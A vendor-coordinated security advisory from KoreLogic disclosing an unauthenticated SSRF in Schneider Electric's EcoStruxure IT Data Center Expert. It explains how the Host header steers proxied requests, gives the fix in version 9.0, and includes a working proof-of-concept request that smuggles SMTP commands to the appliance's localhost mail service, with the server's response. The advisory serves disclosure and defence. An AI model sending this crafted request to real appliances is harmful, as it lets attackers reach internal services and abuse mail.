Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery

Vulnerability Description

The Data Center Expert (“DCE”) appliance insecurely forwards HTTP requests based on user-controlled values, enabling an unauthenticated user to coerce the web application into sending data to arbitrary locations, such as the SMTP service listening on localhost.

Technical Description

When an HTTP request is sent to either the /plugins or /capturelogs endpoints, the request is forwarded based on the Host request header. Since the Host request header is not validated, a user may supply any host / port combination and send data to arbitrary locations and view the response, creating a server-side request forgery vulnerability.

    GET /plugins HTTP/1.1
    Host: example.com

    HTTP/1.1 404 Not Found
    ...
    <!doctype html>
    <html>
    <head>
        <title>Example Domain</title>
    ...

The upstream path is not controllable and HTTP redirects are not followed.

Rather than issuing constrained HTTP requests, it is possible to instead send malicious data to other services that leverage protocols similar to HTTP, such as the SMTP service listening on the appliance’s loopback address. Attempts to send well-formed HTTP requests to the SMTP service result in the TCP connection being prematurely severed, as common HTTP verbs are a sign of malicious activity. However, the proxy mechanism employed by the DCE appliance does not validate the verb, allowing malformed requests that contain valid SMTP commands such as EHLO and MAIL FROM.

When unexpected data is received, such as the Host and X-Forwarded-For request header, a benign error is returned without severing the TCP connection, allowing for additional (and well-formed) SMTP commands to follow.

Mitigation and Remediation Recommendation

Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric’s Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.

Credit

This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc.

Proof of Concept

This behavior allows unauthenticated attackers to interact with services not usually exposed to the internet, such as the appliance’s SMTP service, to further exploit and enumerate the system.

The following is an HTTP request sent to the DCE web interface listening on TCP/80:

    EHLO /plugins?%0a%0dfoobar HTTP/1.1
    Host: 127.0.0.1:25
    Content-Length: 137

    HELO localhost
    MAIL FROM:<root@localhost>
    RCPT TO:<apcreset@localhost>
    DATA
    Subject: foobar

    This is a test email body
    .
    QUIT

As shown in the HTTP response, request headers that do not represent valid SMTP commands are disregarded, allowing the body to be parsed as a valid message:

    HTTP/1.1 200 OK
    ...

    220 dce.example.com ESMTP Sendmail 8.14.4/8.14.4; Mon, 1 Jul 2024 07:00:08 -0400501 5.0.0 Invalid domain name
    500 5.5.1 Command unrecognized: "Host: 127.0.0.1:25"
    500 5.5.1 Command unrecognized: "X-Forwarded-For: 192.168.2.65"
    500 5.5.1 Command unrecognized: "X-Forwarded-Host: 127.0.0.1:25"
    500 5.5.1 Command unrecognized: "X-Forwarded-Server: dce.example.com"
    500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
    500 5.5.1 Command unrecognized: "Content-Length: 141"
    500 5.5.1 Command unrecognized: ""
    250 dce.example.com Hello localhost.localdomain [127.0.0.1], pleased to meet you
    250 2.1.0 <root@localhost>... Sender ok
    250 2.1.5 <apcreset@localhost>... Recipient ok
    354 Enter mail, end with "." on a line by itself
    250 2.0.0 461B08WP030169 Message accepted for delivery
    221 2.0.0 dce.example.com closing connection

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy